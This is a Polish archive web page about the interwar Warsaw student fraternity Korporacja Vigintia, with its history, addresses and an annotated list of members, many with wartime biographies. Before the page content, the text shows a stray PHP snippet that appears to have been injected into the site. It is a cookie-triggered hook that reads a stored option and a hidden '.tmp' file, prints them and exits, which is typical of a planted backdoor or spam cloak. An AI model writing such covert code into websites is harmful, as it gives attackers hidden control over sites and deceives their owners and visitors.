if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Vigintia

Dekiel Vigintii - vide Poszukiwania. Nazwa:
Korporacja Vigintia
Siedziba:
Warszawa
Data powstania:
1925 r.
Barwy:
wiśniowa – biała – złota
Dewiza:
„Salus Rei Publicae Suprema Lex” („Dobro Rzeczypospolitej najwyższym prawem”)

Rys historyczny

Vigintia została założona w 1925 r.

W roku powstania została członkiem Konwentu Polskich Korporacji Akademickich - organizacji międzykorporacyjnej o charakterze “narodowo-państwowym”. Za sprawą ostatniego prezesa Konwentu Mieczysława Dębickiego z Vigintii w 1927 r. Konwent podjął decyzję, aby związki członkowskie przystąpiły do Związku Polskich Korporacji Akademickich. W konsekwencji w 1927 r. także Vigintia wstąpiła do Związku (data starszeństwa związkowego: 15 V 1927 r.). Kandydowała przy K! Sarmatia. Prawa członka rzeczywistego Związku uzyskała w październiku 1930 r. W konsekwencji “reform” jędrzejewiczowskich po 1933 r. zanikła.

Siedziba korporacji mieściła się: w roku akademickim 1927/28 przy ul. Marszałkowskiej 73/1, w roku akademickim 1928/29 przy ul. Zielonej 11, a w latach 1929-33 przy ul. Elsterskiej 11.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 44 nazwiska, w tym jednego członka honorowego.

Brak wiadomości o powojennej działalności Vigintia i spotkaniach jej członków.

Lista członków

Poniższa, niekompletna lista członków Vigintii obejmuje 44 nazwiska. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Zdzisław Dębicki, (19 stycznia 1871 w Warszawie - 7 maja 1931 w Warszawie) z rodziny ziemiańskiej z Wołynia herbu Gryf, s. Gustawa i Aleksandry z Kowalskich, ojciec Mieczysława (Vigintia), absolwent Gimnazjum w Dorpacie, student med. i prawa Uniwersytet Warszawski 1891-94, aresztowany w 1894 za udział w manifestacji na cześć 100. rocznicy powstania kościuszkowskiego, więziony na Pawiaku oraz skazany na dwa lata zsyłki do Orska na Uralu, absolwent prawa Uniwersytet we Lwowie 1898, od 1896 członek Ligi Narodowej, od 1899 w Warszawie, dziennikarz, publicysta, krytyk literacki, pisarz, red. naczelny Tygodnika Ilustrowanego 1918-29, odznaczony Nagrodą Literacką m. st. Warszawy 1931, Filister honorowy Vigintii

Członkowie rzeczywiści

 1. Karol Augustowski, (9 listopada 1903 w Wolicy w Kieleckiem - 1940 w Katyniu), s. Józefa i Katarzyny, absolwent Gimnazjum im. Jędrzeja Śniadeckiego w Kielcach, student i absolwent Wydziału Mechanicznego PW, akt. 1927-32, prezes sem. let. 1928/29 i sem. let. 1929/30, wiceprezes i olderman sem. zim. 1931/32 i sem. zim. 1932/33, absolwent Szkoły Podchorążych Rezerwy Piechoty Nr 10 w Gródku Jagiellońskim 1931, ppor rez. Suwalskiej Brygady Kawalerii, w niewoli sowieckiej, zamordowany przez NKWD
 2. Melik Zade Azis Bel, student PW, c. 1931/32, akt. 1931/32-32
 3. Antoni Banasiński, (1908? - 1993) brat Kazimierza (Vigintia), student UW, akt. 1928-33, sekretarz sem. let. 1927/28, prezes sem. zim. 1930/31
 4. Kazimierz Banasiński, ( - przed 1970) brat Antoniego (Vigintia), student PW, akt. 1927-33, po wojnie na emigracji w Wielkiej Brytanii
 5. Władysław Basza, (7 kwietnia 1907 w Kielcach - 19 marca 2012 w Londynie) absolwent Gimnazjum im. Jana Śniadeckiego w Kielcach, student i absolwent leśnictwa SGGW, akt. 1931-33, sekretarz sem. zim. 1931/32 i sem. zim. 1932/33, w czasie okupacji w Służbie Zwycięstu Polski, kurier na trasie Warszawa-Wilno, aresztowany przez NKWD, więziony w Lidzie i Starej Wilejce, a następnie skazany na 12 lat łagrów, więzień obozów w Workucie i Jarcewie, gdzie pracował przy wyrębie lasu, po amnestii dołączył do II Korpusu PSZ, przeszedł cały szlak bojowy II Korpusu (Irak-Palestyna-Afryka-Włochy), po bitwie pod Monte Cassino odznaczony Krzyżem Virtuti Militari, awansowany na por., po wojnie pozostał na emigracji, przez wiele lat prowadził fabrykę parkietu w brytyjskiej Rodezji, w latach 70-tych wrócił do Wielkiej Brytanii, członek Odziału Świętokrzyskiego Związku Sybiraków, odznaczony 14 odznaczeniami polskimi i brytyjskimi, m.in. Srebrnym Krzyżem Zasługi z Mieczami, dwukrotnie Krzyżem Walecznych, Medalem Wojska, Krzyżem Pamiątkowym Monte, prochy złożono w grobowcu rodzinnym na Cmentarzu Starym w Kielcach
 6. Wincenty Bieganik, student UW, akt. 1927-31
 7. J. Bieroński, mgr
 8. Chojnacki, (?)
 9. Stefan Chyliński, student WSH, c. 1929/30, akt. 1929/30-33
 10. Marjan Chwalibóg, (1902-1983) student i absolwent 1931 Wydziału Mechanicznego PW, akt. 1927-31, po studiach pracownik Katedry Części Maszyn PW, po wojnie dyrektor Centralnego Biura Technicznego Maszyn Włókienniczych, od 1947 pracownik PŁ, najpierw jako kierownik Katedry Podstaw Konstrukcji Mechanicznych, a następnie twórca i kierownik Katedry Części Maszyn Włókienniczych PŁ, prodziekan Wydziału Włókienniczego 1954-60, w pracy naukowej zajmował się zagadnieniami mechaniki, konstrukcji i eksploatacji maszyn włókienniczych
 11. Roman Cieślikiewicz, student UW, c. 1929/30, akt. 1929/30-33
 12. Mieczysław Dębicki, (1 stycznia 1905 w Warszawie - 21 czerwca 1977) herbu Gryf, s. Zdzisława (Vigintia), absolwent Państwowej Szkoły Morskiej w Tczewie 1924, student Wydziału Mechanicznego PW 1925-28 oraz student i absolwent (dyplom z wyróżnieniem) Wydziału Mechanicznego PL 1929-32, akt. 1927-32, wiceprezes sem. let. 1927/28, ostatni prezes Konwentu Polskich Korporacji Akademickich, działacz Obozu Wielkiej Polski, po wojnie m.in. pracownik biura technicznego fabryki silników lotniczych Škoda na Okęciu oraz Państwowych Zakładów Inżynierii, od 1936 wykładowca Państwowej Szkole Technicznej Lotniczo-Samochodowej, w czasie okupacji w AK, po wojnie m.in. pracownik PG, w 1946 organizator Katedry Budowy Pojazdów Mechanicznych Wydziału Mechanicznego PG, prof. nadzw. 1949, prof. zw. 1960, w latach 1946-47 wraz z inż. Jerzym Wernerem w oparciu o przedwojenny PZInż 713 skonstruował pierwszy powojenny polski samochód ciężarowy Star 20, który trafił do masowej produkcji i był produkowany w latach 1948-57
 13. Jerzy Dudziński, student UW, akt. 1927-33, sekretarz sem. let. 1929/30, wiceprezes sem. zim. 1930/31, prezes sem. zim. 1931/32 i sem. zim. 1932/33
 14. Tadeusz Fiutowski, student WSH, c. 1927/28, akt. 1927/28-30
 15. Mikołaj Grell, student PW, akt. 1927-33
 16. Bolesław Hertmanowicz, student PW, c. 1930/31, akt. 1930/31-33
 17. Józef Janiec, student UW, c. 1927/28, akt. 1927/28-33

  Radosław Kochlewski, 1930 r.

 18. Radosław Kochlewski, (1 września 1907 w Warszawie - 5 października 1942 w Ostrowcu Świętokrzyskim) herbu Prawdzic, s. Stanisława (z maj. Kletyszcze k. Dywinu w pow. kobryńskim, sybiraka) i Marii z Tyszkiewiczów, w czasie I wojny światowej z rodziną ewakuowany do Rosji, ukończył dwie klasy w Polskiej Szkole Realnej im. T. Kościuszki w Połtawie, powrócił do Polski w 1919 r., absolwent Gimnazjum Państwowego im. Jana Śniadeckiego w Kielcach 1925, student i absolwent 1934 Wydziału Mechanicznego, Oddział Konstrukcyjny PW (inż. mechanik), c. 1927/28, akt. 1927/28-31, sekretarz sem. let. 1928/29, wiceprezes sem. let. 1929/30, prezes Bratniej Pomocy Studentów PW i delegat do Centrali Akademickich Bratnich Pomocy 1933/34, wiceprezes Centralnej Rady Naukowej Polskiej Młodzieży Akademickiej 1933/34, działacz MW, ONR ABC oraz Organizacji Polskiej (poziom “C”), pracował w Spółce Akcyjnej Wielkich Pieców i Zakładów Ostrowickich, od 1937 jako starszy konstruktor w Biurze Technicznym, członek SIMP, ochotnik w wojnie obronnej 1939, walczył pod Tomaszowem i Janowem Lubelskim, wzięty do niewoli, z której zbiegł, po wrześniu 1939 prowadził własne Warsztaty Mechaniczne w Ostrowcu Świętokrzyskim (w 1942 zatrudniał 16 stałych pracowników), organizator struktur Związku Jaszczurczego w Ostrowcu Świętokrzyskim, prowadził we własnym warsztacie punkt dystrybucji prasy konspiracyjnej, aresztowany przez Gestapo 15 sierpnia 1942 w Ostrowcu i tam zamordowany, w czasie śledztwa torturowany - milczał, bliższe okoliczności śmierci nieznane, zawiadomienie o śmierci z dnia 5 października 1942, miejsce pochówku nieznane, symboliczna płyta na Cmentarzu Nowym w Kielcach (kw. A(1?), rz. 5, m. 3A) oraz inskrypcja na płycie na Cmentarzu Powązkowskim w Warszawie (kw. 69, rz. 6, gr. 17-18), od 1935 żonaty z Zofią z Piechowskich, miał dwóch synów Jacka (ur. 1938) i Wojciecha (ur. 1941)
  [Źródła (poza wskazanymi poniżej spisu członków): relacja syna Wojciecha Kochlewskiego]

 19. Zbigniew Koczanowicz, student SGGW, c. 1931/32, akt. 1931/32-33
 20. Aleksander Król, student UW, c. 1930/31, akt. 1930/31-33
 21. Mieczysław Kubacki, student PW, c. 1929/30, akt. 1929/30-33
 22. Stanisław Kwarczyński, (1903 - prawd. ok. 1980) s. Władysława i Zofii z d. Nitsche, absolwent Męskiej Szkoły Handlowej (późniejsze Męskie Gimnazjum im. Jana Śniadeckiego w Kielcach), student UW, akt. 1927-33, prezes sem. let. 1927/28, po wojnie kierownik ekspozytury Przedsiębiorstwa Robót Czerpalnych i Podwodnych w Szczecinie, prof. PG, działacz Pomorskiego Związku Piłki Nożnej, odznaczony Srebrnym Krzyżem Zasługi 1954
 23. Stefan Lech, (5 lipca 1905 w Szydłowie - 1940 w Katyniu), s. Tomasza i Teofili ze Szpakiewiczów, absolwent Gimnazjum im. Jędrzeja Śniadeckiego w Kielcach, student SGGW, c. 1927/28, akt. 1927/28-29, ppor. rez., przypisany do 2 Pułku Artylerii Lekkiej, w niewoli sowieckiej, zamordowany przez NKWD
 24. Stanisław Lipowski, student UW, akt. 1927-29
 25. Stefan Matusiak, student UW, c. 1927/28, akt. 1927/28-33
 26. Edward Meissner, student WSH, akt. 1927-29
 27. Marian Molga, student SGGW, c. 1927/28, akt. 1927/28
 28. Adam Moryciński, (1902-1970) student UW, c. 1927/28, akt. 1927/28-31, wiceprezes sem. let. 1928/29
 29. Stefan Moryciński, (1903-1984) student PW, akt. 1927-31
 30. Jan Olech, student SGGW, akt. 1927-31
 31. Jan Pawłowski, student PW, c. 1927/28, akt. 1927/28-33
 32. Ludwik Stępniewski, student UW, c. 1929/30, akt. 1929/30-33
 33. Eugeniusz Szadkowski, student WSH, c. 1927/28, akt. 1927/28-33, sekretarz sem. zim. 1930/31
 34. Gustaw Szeller (Szellar), student UW, c. 1931/32, akt. 1931/32-33
 35. Janusz Ślaski, student SGGW, c. 1927/28, akt. 1927/28
 36. Witold Świderski, student WSH, c. 1927/28, akt. 1927/28-33
 37. Edward Tołubiński, student WSH, c. 1927/28, akt. 1927/28-30
 38. Edward Treszczanowicz, (1908-1985) student UW, c. 1931/32, akt. 1931/32-33
 39. Ludwik Witkowski, student UW, akt. 1927-31

  Zygmunt Wójcik, lata 30-te (?).

 40. Zygmunt Stanisław Wójcik, (27 kwietnia 1907 w Kielcach - 6 stycznia 1981 w Bydgoszczy) s. Adama i Antoniny z d. Nowicka, absolwent Gimnazjum im. J. Śniadeckiego w Kielcach 1925, student i absolwent (mgr) chemii UW, akt. 1927-33, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim, po studiach kierownik laboratorium i chromowni w Zakładach Wyrobów Metalowych Konrad Jarnuszkiewicz i S-ka w Warszawie, ppor. rez., w wojnie obronnej 1939 w 41 Dywizjonie Artylerii Lekkiej w obronie Warszawy, więzień obozów jenieckich w XB Nienburg, XVIII C Spittal i II C Woldenberg, po wojnie instruktor uprawy tytoniu w Zakładzie Uprawy Tytoniu w Grudziądzu, w 1947 aresztowany i skazany w trybie doraźnym za działania na szkodę Skarbu Państwa na pięć lat więzienia, zwolniony przedterminowo, od 1952 do emerytury w Spółdzielni Pracy Wytwórni Barwników i Wyrobów Chemicznych w Bydgoszczy (przemianowej na Spółdzielnia Pracy “Technochemia”) kolejno jako majster produkcji, kierownik laboratorium, kierownik działu produkcyjnego i kierownik Zakładu, działacz społeczny PTTK, Związku Kynologicznego oraz spółdzielni mieszkaniowej, żeglarz, hobbysta fotografik, pochowany na cmentarzu parafii pw. św. Wincentego a Paulo przy ul. Kardynała Wyszyńskiego w Bydgoszczy

 41. Zade Rahim Zejnał (Zejnal), student WSH, c. 1931/32, akt. 1931/32-33
 42. Stanisław Żaboklicki, student UW, c. 1927/28, akt. 1927/28-33
 43. Zygmunt Żurkowski, (?)

Listę członków opracowano na podstawie:

1) biuletynów Warszawskiego Koła Międzykorporacyjnego z lat 1927-1933,
2) materiałów archiwalnych z Archiwum Korporacyjnego,
3) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Vigintia.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 15 IX 2010 r.
Ostatnia zmiana: 1 IV 2020 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Korporacja Vigintia (Warszawa), (na:) www.archiwumkorporacyjne.pl, stan 1 IV 2020 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }